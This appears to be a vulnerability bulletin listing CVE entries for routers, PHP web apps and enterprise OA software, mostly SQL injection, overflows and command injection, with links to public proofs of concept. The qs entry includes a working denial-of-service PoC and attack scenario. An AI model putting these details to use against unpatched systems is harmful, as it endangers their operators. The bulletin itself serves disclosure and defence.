| Tenda--WH450 | A vulnerability has been found in Tenda WH450 1.0.0.18. This vulnerability affects unknown code of the file /goform/SetIpBind of the component HTTP Request Handler. The manipulation of the argument page leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-12-29 | 7.2 | CVE-2025-15177 | VDB-338562 | Tenda WH450 HTTP Request SetIpBind stack-based overflow VDB-338562 | CTI Indicators (IOB, IOC, IOA) Submit #721216 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/SetIpBind/SetIpBind.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/SetIpBind/SetIpBind.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was found in Tenda WH450 1.0.0.18. This issue affects some unknown processing of the file /goform/VirtualSer of the component HTTP Request Handler. The manipulation of the argument page results in stack-based buffer overflow. The attack can be launched remotely. The exploit has been made public and could be used. | 2025-12-29 | 7.2 | CVE-2025-15178 | VDB-338563 | Tenda WH450 HTTP Request VirtualSer stack-based overflow VDB-338563 | CTI Indicators (IOB, IOC, IOA) Submit #721217 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/VirtualSer/VirtualSer.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/VirtualSer/VirtualSer.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was determined in Tenda WH450 1.0.0.18. Impacted is an unknown function of the file /goform/qossetting. This manipulation of the argument page causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-29 | 7.2 | CVE-2025-15179 | VDB-338564 | Tenda WH450 qossetting stack-based overflow VDB-338564 | CTI Indicators (IOB, IOC, IOA) Submit #721218 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/qossetting/qossetting.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/qossetting/qossetting.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was identified in Tenda WH450 1.0.0.18. The affected element is an unknown function of the file /goform/webExcptypemanFilte of the component HTTP Request Handler. Such manipulation of the argument page leads to stack-based buffer overflow. The attack may be launched remotely. The exploit is publicly available and might be used. | 2025-12-29 | 7.2 | CVE-2025-15180 | VDB-338565 | Tenda WH450 HTTP Request webExcptypemanFilte stack-based overflow VDB-338565 | CTI Indicators (IOB, IOC, IOA) Submit #721219 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/webExcptypemanFilter/webExcptypemanFilter.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/webExcptypemanFilter/webExcptypemanFilter.md#reproduce https://www.tenda.com.cn/ |
| code-projects--Refugee Food Management System | A security flaw has been discovered in code-projects Refugee Food Management System 1.0. The impacted element is an unknown function of the file /home/pagenateRefugeesList.php. Performing manipulation of the argument rfid results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. | 2025-12-29 | 7.3 | CVE-2025-15181 | VDB-338566 | code-projects Refugee Food Management System pagenateRefugeesList.php sql injection VDB-338566 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721270 | Code-projects Refugee Food Management System v1.0 SQL Injection Submit #722805 | code-projects Refugee Food Management System 1.0 SQL Injection (Duplicate) https://github.com/ctg503/CVE/issues/1 https://code-projects.org/ |
| code-projects--Refugee Food Management System | A weakness has been identified in code-projects Refugee Food Management System 1.0. This affects an unknown function of the file /home/served.php. Executing manipulation of the argument refNo can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. | 2025-12-29 | 7.3 | CVE-2025-15182 | VDB-338567 | code-projects Refugee Food Management System served.php sql injection VDB-338567 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721272 | Code-projects Refugee Food Management System v1.0 SQL Injection https://github.com/ctg503/CVE/issues/2 https://code-projects.org/ |
| code-projects--Refugee Food Management System | A security vulnerability has been detected in code-projects Refugee Food Management System 1.0. This impacts an unknown function of the file /home/viewtakenfd.php. The manipulation of the argument tfid leads to sql injection. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. | 2025-12-29 | 7.3 | CVE-2025-15183 | VDB-338568 | code-projects Refugee Food Management System viewtakenfd.php sql injection VDB-338568 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721273 | Code-projects Refugee Food Management System v1.0 SQL Injection Submit #722808 | code-projects Refugee Food Management System 1.0 SQL Injection (Duplicate) Submit #722809 | code-projects Refugee Food Management System 1.0 SQL Injection (Duplicate) Submit #722810 | code-projects Refugee Food Management System 1.0 SQL Injection (Duplicate) https://github.com/ctg503/CVE/issues/3 https://code-projects.org/ |
| code-projects--Refugee Food Management System | A vulnerability was detected in code-projects Refugee Food Management System 1.0. Affected is an unknown function of the file /home/refugeesreport2.php. The manipulation of the argument a results in sql injection. The attack may be performed from remote. The exploit is now public and may be used. | 2025-12-29 | 7.3 | CVE-2025-15184 | VDB-338569 | code-projects Refugee Food Management System refugeesreport2.php sql injection VDB-338569 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721274 | Code-projects Refugee Food Management System v1.0 SQL Injection https://github.com/ctg503/CVE/issues/4 https://code-projects.org/ |
| code-projects--Refugee Food Management System | A flaw has been found in code-projects Refugee Food Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /home/refugeesreport.php. This manipulation of the argument a causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. | 2025-12-29 | 7.3 | CVE-2025-15185 | VDB-338570 | code-projects Refugee Food Management System refugeesreport.php sql injection VDB-338570 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721275 | Code-projects Refugee Food Management System v1.0 SQL Injection https://github.com/ctg503/CVE/issues/5 https://code-projects.org/ |
| code-projects--Refugee Food Management System | A vulnerability has been found in code-projects Refugee Food Management System 1.0. Affected by this issue is some unknown functionality of the file /home/addusers.php. Such manipulation of the argument a leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-12-29 | 7.3 | CVE-2025-15186 | VDB-338571 | code-projects Refugee Food Management System addusers.php sql injection VDB-338571 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721277 | Code-projects Refugee Food Management System v1.0 SQL Injection Submit #722802 | code-projects Refugee Food Management System 1.0 SQL Injection (Duplicate) https://github.com/ctg503/CVE/issues/6 https://code-projects.org/ |
| code-projects--Assessment Management | A vulnerability was determined in code-projects Assessment Management 1.0. Affected by this issue is some unknown functionality of the file /admin/add-module.php. This manipulation of the argument linked[] causes sql injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-29 | 7.3 | CVE-2025-15195 | VDB-338582 | code-projects Assessment Management add-module.php sql injection VDB-338582 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #724717 | Code-projects Assessment Management v1.0 SQL injection https://github.com/Limingqian123/CVE/issues/3 https://code-projects.org/ |
| code-projects--Assessment Management | A vulnerability was identified in code-projects Assessment Management 1.0. This affects an unknown part of the file login.php. Such manipulation of the argument userid leads to sql injection. The attack can be launched remotely. The exploit is publicly available and might be used. | 2025-12-29 | 7.3 | CVE-2025-15196 | VDB-338583 | code-projects Assessment Management login.php sql injection VDB-338583 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #724718 | Code-projects Assessment Management v1.0 SQL injection https://github.com/Limingqian123/CVE/issues/4 https://code-projects.org/ |
| code-projects--College Notes Uploading System | A weakness has been identified in code-projects College Notes Uploading System 1.0. This issue affects some unknown processing of the file /login.php. Executing manipulation of the argument User can lead to sql injection. The attack may be launched remotely. The exploit has been made available to the public and could be exploited. | 2025-12-29 | 7.3 | CVE-2025-15198 | VDB-338585 | code-projects College Notes Uploading System login.php sql injection VDB-338585 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #724724 | Code-projects College Notes Uploading System v1.0 SQL injection https://github.com/Limingqian123/CVE/issues/10 https://code-projects.org/ |
| Campcodes--Supplier Management System | A flaw has been found in Campcodes Supplier Management System 1.0. This impacts an unknown function of the file /admin/add_area.php. Executing manipulation of the argument txtAreaCode can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used. | 2025-12-29 | 7.3 | CVE-2025-15206 | VDB-338579 | Campcodes Supplier Management System add_area.php sql injection VDB-338579 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #723951 | Campcodes Supplier Management System V1.0 SQL Injection https://github.com/IMZGforever/CVEs/issues/5 https://www.campcodes.com/ |
| Campcodes--Supplier Management System | A vulnerability has been found in Campcodes Supplier Management System 1.0. Affected is an unknown function of the file /admin/view_products.php. The manipulation of the argument chkId[] leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-12-29 | 7.3 | CVE-2025-15207 | VDB-338580 | Campcodes Supplier Management System view_products.php sql injection VDB-338580 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #723953 | Campcodes Supplier Management System 1.0 SQL Injection https://github.com/IMZGforever/CVEs/issues/6 https://www.campcodes.com/ |
| code-projects--Refugee Food Management System | A security flaw has been discovered in code-projects Refugee Food Management System 1.0. Affected by this issue is some unknown functionality of the file /home/editrefugee.php. The manipulation of the argument rfid results in sql injection. The attack can be launched remotely. The exploit has been released to the public and may be exploited. | 2025-12-29 | 7.3 | CVE-2025-15208 | VDB-338593 | code-projects Refugee Food Management System editrefugee.php sql injection VDB-338593 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721753 | Code-projects Refugee Food Management System v1.0 SQL Injection https://github.com/11alert/CVE/issues/1 https://code-projects.org/ |
| Sunnet--WMPro | WMPro developed by Sunnet has an Arbitrary File Read vulnerability, allowing unauthenticated remote attackers to exploit Relative Path Traversal to read arbitrary system files. | 2025-12-29 | 7.5 | CVE-2025-15225 | https://www.twcert.org.tw/tw/cp-132-10602-c1c69-1.html https://www.twcert.org.tw/en/cp-139-10603-67149-2.html |
| WELLTEND TECHNOLOGY--BPMFlowWebkit | BPMFlowWebkit developed by WELLTEND TECHNOLOGY has a Arbitrary File Read vulnerability, allowing unauthenticated remote attackers to exploit Absolute Path Traversal to download arbitrary system files. | 2025-12-29 | 7.5 | CVE-2025-15227 | https://www.twcert.org.tw/tw/cp-132-10604-c65aa-1.html https://www.twcert.org.tw/en/cp-139-10605-426b6-2.html |
| code-projects--Simple Stock System | A flaw has been found in code-projects Simple Stock System 1.0. This affects an unknown function of the file /market/login.php. Executing manipulation of the argument Username can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used. | 2025-12-30 | 7.3 | CVE-2025-15243 | VDB-338633 | code-projects Simple Stock System login.php sql injection VDB-338633 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725689 | Code-Projects Simple Stock System V1.0 SQL Injection https://github.com/c13641462064-lgtm/sql_injection/issues/1 https://code-projects.org/ |
| gmg137--snap7-rs | A vulnerability was identified in gmg137 snap7-rs up to 153d3e8c16decd7271e2a5b2e3da4d6f68589424. Affected by this issue is the function snap7_rs::client::S7Client::download of the file client.rs. Such manipulation leads to heap-based buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-30 | 7.3 | CVE-2025-15247 | VDB-338637 | gmg137 snap7-rs client.rs download heap-based overflow VDB-338637 | CTI Indicators (IOB, IOC, IOA) https://gitee.com/gmg137/snap7-rs/issues/ID2H7V |
| Edimax--BR-6208AC | A vulnerability was identified in Edimax BR-6208AC 1.02/1.03. Affected is the function formStaDrvSetup of the file /goform/formStaDrvSetup of the component Web-based Configuration Interface. The manipulation of the argument rootAPmac leads to command injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. Edimax confirms this issue: "The product mentioned, EDIMAX BR-6208AC V2, has reached its End of Life (EOL) status. It is no longer supported or maintained by Edimax, and it is no longer available for purchase in the market. Consequently, there will be no further firmware updates or patches for this device. We recommend users upgrade to newer models for better security." This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-30 | 7.3 | CVE-2025-15256 | VDB-338646 | Edimax BR-6208AC Web-based Configuration formStaDrvSetup command injection VDB-338646 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #722014 | Edimax BR-6208AC V2_1.02 Command Injection https://tzh00203.notion.site/EDIMAX-BR-6208AC-V2_1-02-Command-Injection-Vulnerability-in-Web-formStaDrvSetup-handler-2d2b5c52018a803ebd91c200b3e2925b?source=copy_link |
| Edimax--BR-6208AC | A security flaw has been discovered in Edimax BR-6208AC 1.02/1.03. Affected by this vulnerability is the function formRoute of the file /gogorm/formRoute of the component Web-based Configuration Interface. The manipulation of the argument strIp/strMask/strGateway results in command injection. The attack can be executed remotely. The exploit has been released to the public and may be exploited. Edimax confirms this issue: "The product mentioned, EDIMAX BR-6208AC V2, has reached its End of Life (EOL) status. It is no longer supported or maintained by Edimax, and it is no longer available for purchase in the market. Consequently, there will be no further firmware updates or patches for this device. We recommend users upgrade to newer models for better security." This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-30 | 7.3 | CVE-2025-15257 | VDB-338647 | Edimax BR-6208AC Web-based Configuration formRoute command injection VDB-338647 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #722426 | Edimax BR-6208AC V2_1.02 Command Injection https://tzh00203.notion.site/EDIMAX-BR-6208AC-V2_1-02-Command-Injection-Vulnerability-in-Web-formRoute-handler-2d3b5c52018a805983d3cf0780b28407?source=copy_link |
| BiggiDroid--Simple PHP CMS | A weakness has been identified in BiggiDroid Simple PHP CMS 1.0. Affected is an unknown function of the file /admin/login.php of the component Admin Login. Executing manipulation of the argument Username can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. | 2025-12-30 | 7.3 | CVE-2025-15263 | VDB-338657 | BiggiDroid Simple PHP CMS Admin Login login.php sql injection VDB-338657 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725820 | BiggiDroid Simple-PHP-Blog 1.0 SQL Injection https://gitee.com/devilrunsun/mywork/issues/IDGMME |
| n/a--FeehiCMS | A vulnerability was determined in FeehiCMS up to 2.1.1. Impacted is an unknown function of the file frontend/web/timthumb.php of the component TimThumb. Executing manipulation of the argument src can lead to server-side request forgery. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-30 | 7.3 | CVE-2025-15264 | VDB-338663 | FeehiCMS TimThumb timthumb.php server-side request forgery VDB-338663 | CTI Indicators (IOB, IOC, IOA) Submit #718278 | FeehiCMS https://github.com/liufee/cms v2.1.1 Server-Side Request Forgery |
| HTTP--DOS | Improper Input Validation vulnerability in qs (parse modules) allows HTTP DoS.This issue affects qs: < 6.14.1. SummaryThe arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable. DetailsThe arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2). Vulnerable code (lib/parse.js:159-162): if (root === '[]' && options.parseArrays) { obj = utils.combine([], leaf); // No arrayLimit check } Working code (lib/parse.js:175): else if (index <= options.arrayLimit) { // Limit checked here obj = []; obj[index] = leaf; } The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays. PoCTest 1 - Basic bypass: npm install qs const qs = require('qs'); const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 }); console.log(result.a.length); // Output: 6 (should be max 5) Test 2 - DoS demonstration: const qs = require('qs'); const attack = 'a[]=' + Array(10000).fill('x').join('&a[]='); const result = qs.parse(attack, { arrayLimit: 100 }); console.log(result.a.length); // Output: 10000 (should be max 100) Configuration: * arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2) * Use bracket notation: a[]=value (not indexed a[0]=value) ImpactDenial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection. Attack scenario: * Attacker sends HTTP request: GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times) * Application parses with qs.parse(query, { arrayLimit: 100 }) * qs ignores limit, parses all 100,000 elements into array * Server memory exhausted → application crashes or becomes unresponsive * Service unavailable for all users Real-world impact: * Single malicious request can crash server * No authentication required * Easy to automate and scale * Affects any endpoint parsing query strings with bracket notation | 2025-12-29 | 7.5 | CVE-2025-15284 | https://github.com/ljharb/qs/security/advisories/GHSA-6rw7-vpxm-498p https://github.com/ljharb/qs/commit/3086902ecf7f088d0d1803887643ac6c03d415b9 |
| itsourcecode--Society Management System | A vulnerability was detected in itsourcecode Society Management System 1.0. Impacted is the function edit_admin_query of the file /admin/edit_admin_query.php. Performing manipulation of the argument Username results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. | 2025-12-30 | 7.3 | CVE-2025-15353 | VDB-338740 | itsourcecode Society Management System edit_admin_query.php edit_admin_query sql injection VDB-338740 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #726280 | itsourcecode Society Management System V1.0 SQL injection https://github.com/BUPT2025201/CVE/issues/4 https://itsourcecode.com/ |
| itsourcecode--Society Management System | A flaw has been found in itsourcecode Society Management System 1.0. The affected element is an unknown function of the file /admin/add_admin.php. Executing manipulation of the argument Username can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used. | 2025-12-30 | 7.3 | CVE-2025-15354 | VDB-338741 | itsourcecode Society Management System add_admin.php sql injection VDB-338741 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #726282 | itsourcecode Society Management System V1.0 SQL injection https://github.com/BUPT2025201/CVE/issues/2 https://itsourcecode.com/ |
| Delta Electronics--DVP-12SE11T | DVP-12SE11T - Denial of Service Vulnerability | 2025-12-30 | 7.5 | CVE-2025-15358 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2025-00022_DVP-12SE11T%20Multiple%20Vulnerabilities.pdf |
| Tenda--i24 | A vulnerability has been found in Tenda i24, 4G03 Pro, 4G05, 4G08, G0-8G-PoE, Nova MW5G and TEG5328F up to 65.10.15.6. Affected is an unknown function of the component Shadow File. Such manipulation with the input Fireitup leads to hard-coded credentials. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. | 2025-12-31 | 7.8 | CVE-2025-15371 | VDB-339075 | Tenda i24 Shadow File hard-coded credentials VDB-339075 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #727155 | Tenda Tenda i24v3.0 V3.0.0.8(4008) V3.0.0.8(4008) Hard-coded Credentials Submit #727283 | Tenda 4G03ProV1.0re V04.03.01.49 Hard-coded Credentials (Duplicate) Submit #727284 | Tenda 4G05V1.0re V04.05.01.15 Hard-coded Credentials (Duplicate) Submit #727285 | Tenda 4G08V1.0re V04.08.01.28 Hard-coded Credentials (Duplicate) Submit #727302 | Tenda G0-8G-PoEV2.0si V16.01.8.5 Hard-coded Credentials (Duplicate) Submit #727305 | Tenda MW5GV1.0re V1.0.0.35 Hard-coded Credentials (Duplicate) Submit #727306 | Tenda TEG5328FV1.0ma V65.10.15.6 Hard-coded Credentials (Duplicate) https://github.com/vuln-1/vuln/blob/main/Tenda/i24v3.0_V3.0.0.8/report-1.md https://www.tenda.com.cn/ |
| code-projects--Online Guitar Store | A vulnerability has been found in code-projects Online Guitar Store 1.0. This impacts an unknown function of the file /admin/Create_category.php. Such manipulation of the argument dre_Ctitle leads to sql injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2026-01-01 | 7.3 | CVE-2025-15407 | VDB-339327 | code-projects Online Guitar Store Create_category.php sql injection VDB-339327 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #728391 | Code-projects Online Guitar Store v1.0 SQL Injection https://github.com/jjjjj-zr/jjjjjzr19/issues/1 https://code-projects.org/ |
| code-projects--Online Guitar Store | A vulnerability was found in code-projects Online Guitar Store 1.0. Affected is an unknown function of the file /admin/Create_product.php. Performing manipulation of the argument dre_title results in sql injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. | 2026-01-01 | 7.3 | CVE-2025-15408 | VDB-339328 | code-projects Online Guitar Store Create_product.php sql injection VDB-339328 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #728392 | Code-projects Online Guitar Store v1.0 SQL Injection https://github.com/jjjjj-zr/jjjjjzr19/issues/2 https://code-projects.org/ |
| code-projects--Online Guitar Store | A vulnerability was determined in code-projects Online Guitar Store 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/Delete_product.php. Executing manipulation of the argument del_pro can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. | 2026-01-01 | 7.3 | CVE-2025-15409 | VDB-339329 | code-projects Online Guitar Store Delete_product.php sql injection VDB-339329 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #728393 | Code-projects Online Guitar Store v1.0 SQL Injection https://github.com/jjjjj-zr/jjjjjzr19/issues/3 https://code-projects.org/ |
| code-projects--Online Guitar Store | A vulnerability was identified in code-projects Online Guitar Store 1.0. Affected by this issue is some unknown functionality of the file /login.php. The manipulation of the argument L_email leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. | 2026-01-01 | 7.3 | CVE-2025-15410 | VDB-339330 | code-projects Online Guitar Store login.php sql injection VDB-339330 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #728394 | Code-projects Online Guitar Store v1.0 SQL Injection https://github.com/jjjjj-zr/jjjjjzr19/issues/4 https://code-projects.org/ |
| Yonyou--KSOA | A security vulnerability has been detected in Yonyou KSOA 9.0. This affects an unknown part of the file /worksheet/agent_work_report.jsp. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15420 | VDB-339342 | Yonyou KSOA agent_work_report.jsp sql injection VDB-339342 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721099 | Yonyou KSOA V9.0 SQL Injection Submit #721531 | Yonyou KSOA V9.0 SQL Injection (Duplicate) https://github.com/master-abc/cve/blob/main/Yonyou%20Space-Time%20Enterprise%20Information%20Integration%20KSOA%20Platformworksheetagent_work_report.jsp%20SQL%20injection.md |
| Yonyou--KSOA | A vulnerability was detected in Yonyou KSOA 9.0. This vulnerability affects unknown code of the file /worksheet/agent_worksadd.jsp of the component HTTP GET Parameter Handler. The manipulation of the argument ID results in sql injection. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15421 | VDB-339343 | Yonyou KSOA HTTP GET Parameter agent_worksadd.jsp sql injection VDB-339343 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721324 | Yonyou KSOA V9.0 SQL Injection Submit #721527 | Yonyou KSOA V9.0 SQL Injection (Duplicate) https://github.com/master-abc/cve/blob/main/Yonyou%20Space-Time%20Enterprise%20Information%20Integration%20KSOA%20Platformworksheetagent_worksadd.jsp%20SQL%20injection.md |
| Yonyou--KSOA | A vulnerability was found in Yonyou KSOA 9.0. The affected element is an unknown function of the file /worksheet/agent_worksdel.jsp of the component HTTP GET Parameter Handler. Performing manipulation of the argument ID results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15424 | VDB-339346 | Yonyou KSOA HTTP GET Parameter agent_worksdel.jsp sql injection VDB-339346 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721348 | Yonyou KSOA V9.0 SQL Injection Submit #721526 | Yonyou KSOA V9.0 SQL Injection (Duplicate) https://github.com/master-abc/cve/blob/main/Yonyou%20Space-Time%20Enterprise%20Information%20Integration%20KSOA%20Platformworksheetagent_worksdel.jsp%20SQL%20injection.md https://github.com/master-abc/cve/blob/main/Yonyou%20Space-Time%20Enterprise%20Information%20Integration%20KSOA%20Platformworksheetagent_worksdel.jsp%20SQL%20injection.md#vulnerability-details-and-poc |
| Yonyou--KSOA | A vulnerability was determined in Yonyou KSOA 9.0. The impacted element is an unknown function of the file /worksheet/del_user.jsp of the component HTTP GET Parameter Handler. Executing manipulation of the argument ID can lead to sql injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15425 | VDB-339347 | Yonyou KSOA HTTP GET Parameter del_user.jsp sql injection VDB-339347 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721352 | Yonyou KSOA V9.0 SQL Injection https://github.com/master-abc/cve/blob/main/Yonyou%20Space-Time%20Enterprise%20Information%20Integration%20KSOA%20Platform%20worksheet%20del_user.jsp%20SQL%20injection.md https://github.com/master-abc/cve/blob/main/Yonyou%20Space-Time%20Enterprise%20Information%20Integration%20KSOA%20Platform%20worksheet%20del_user.jsp%20SQL%20injection.md#vulnerability-details-and-poc |
| jackying--H-ui.admin | A vulnerability was identified in jackying H-ui.admin up to 3.1. This affects an unknown function in the library /lib/webuploader/0.1.5/server/preview.php. The manipulation leads to unrestricted upload. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15426 | VDB-339348 | jackying H-ui.admin preview.php unrestricted upload VDB-339348 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721457 | https://www.h-ui.net/ H-ui.admin v3.1 RCE https://github.com/TiKi-r/CVE-Report/blob/main/H-ui.admin%20RCE.md https://github.com/TiKi-r/CVE-Report/blob/main/H-ui.admin%20RCE.md#4-proof-of-concept-poc |
| Seeyon--Zhiyuan OA Web Application System | A security flaw has been discovered in Seeyon Zhiyuan OA Web Application System up to 20251222. This impacts an unknown function of the file /carManager/carUseDetailList.j%73p. The manipulation of the argument CAR_BRAND_NO results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15427 | VDB-339349 | Seeyon Zhiyuan OA Web Application System carUseDetailList.j%73p sql injection VDB-339349 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721493 | Seeyou Collaborative Platform V1.0 SQL Injection https://github.com/cly-yuxiu/CVE/issues/2 |
| Yonyou--KSOA | A vulnerability was detected in Yonyou KSOA 9.0. Affected is an unknown function of the file /kp/PrintZPYG.jsp. The manipulation of the argument zpjhid results in sql injection. It is possible to launch the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15434 | VDB-339361 | Yonyou KSOA PrintZPYG.jsp sql injection VDB-339361 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721490 | Yonyou KSOA V1.0 SQL Injection https://github.com/cly-yuxiu/CVE/issues/1 |
| Yonyou--KSOA | A flaw has been found in Yonyou KSOA 9.0. Affected by this vulnerability is an unknown functionality of the file /worksheet/work_update.jsp. This manipulation of the argument Report causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15435 | VDB-339362 | Yonyou KSOA work_update.jsp sql injection VDB-339362 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721918 | Yonyou KSOA V1.0 SQL Injection https://github.com/xiaozipang/CVE/issues/1 |
| Yonyou--KSOA | A vulnerability has been found in Yonyou KSOA 9.0. Affected by this issue is some unknown functionality of the file /worksheet/work_edit.jsp. Such manipulation of the argument Report leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 7.3 | CVE-2025-15436 | VDB-339363 | Yonyou KSOA work_edit.jsp sql injection VDB-339363 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721925 | Yonyou KSOA V1.0 SQL Injection https://github.com/xinshou-test/CVE/issues/2 |
| Seeyon--Zhiyuan OA Web Application System | A flaw has been found in Seeyon Zhiyuan OA Web Application System up to 20251223. The impacted element is an unknown function of the file /assetsGroupReport/fixedAssetsList.j%73p. Executing a manipulation of the argument unitCode can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-04 | 7.3 | CVE-2025-15446 | VDB-339479 | Seeyon Zhiyuan OA Web Application System fixedAssetsList.j%73p sql injection VDB-339479 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721917 | Seeyou Collaborative Platform V1.0 SQL Injection https://github.com/xiaozipang/CVE/issues/2 |
| Seeyon--Zhiyuan OA Web Application System | A vulnerability has been found in Seeyon Zhiyuan OA Web Application System up to 20251223. This affects an unknown function of the file /assetsGroupReport/assetsService.j%73p. The manipulation of the argument unitCode leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-04 | 7.3 | CVE-2025-15447 | VDB-339480 | Seeyon Zhiyuan OA Web Application System assetsService.j%73p sql injection VDB-339480 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721926 | Seeyou Collaborative Platform V1.0 SQL Injection https://github.com/xinshou-test/CVE/issues/1 |
